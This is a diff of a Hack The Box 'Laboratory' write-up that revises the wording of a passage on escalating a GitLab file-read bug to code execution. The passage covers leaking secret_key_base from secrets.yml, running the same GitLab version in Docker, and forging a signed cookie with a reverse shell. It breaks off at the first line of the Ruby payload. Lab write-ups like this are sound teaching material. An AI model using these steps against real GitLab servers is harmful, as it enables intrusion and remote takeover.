vandycknick/nvd.codes/_posts/2021/2021-05-13-hack-the-box-laboratory.md

 gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh
 ```

-This file, in particular, isn't all too interesting, but there is this file `/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml` that contains the secret that GitLab uses to sign cookies.
+This file on its own isn't all too interesting.
+But doing a bit of research, you will learn that every GitLab instance will contain this file `/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml`, which has all the secrets required to start signing custom cookies.
 This is the crucial piece we need to transform our LFI exploit into an RCE.

 The HackerOne article contains a snippet of code that allows us to generate the serialized payload we can inject into the cookie.
 To create this payload, we'll need access to the GitLab Rails Console.
-The best way to get access to this Rails Console is via the GitLab docker image.
+The best way to get access to this console is via the GitLab docker image.
 This even allows us to run the exact same version as our target machine is running.
-To get a shell in the GitLab container, you can run:
+To get a shell in the container, you can run:

 ```sh
 docker run -it gitlab/gitlab-ce:12.8.1-ce.0 bash
 ```

-This might take a while, so go grab a coffee.
-This local GitLab instance should be running in just a few.
+This might take a while, so go grab a coffee, this local GitLab instance should be running in just a few.
 When the instance is up and running, use `docker ps` to find the id of the container.
 You can then use `docker exec -it <container-id> bash` to get a shell inside this container.
 Now let's replace the `secret_key_base` in `/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml` in our docker image with the secret we just leaked from our target machine.
-This will allow us to create a valid signed cookie with our reverse shell embedded.
+This will allow us to create a valid signed cookie with our reverse shell embedded within.
 Before we can do this, restart GitLab with `gitlab-ctl restart`.
-When that is finish we can launch the rails console with `gitlab-rails console` and past in the following payload:
+When that is finish we can launch the rails console with `gitlab-rails console` and paste in the following payload:

 ```ruby
 request = ActionDispatch::Request.new(Rails.application.env_config)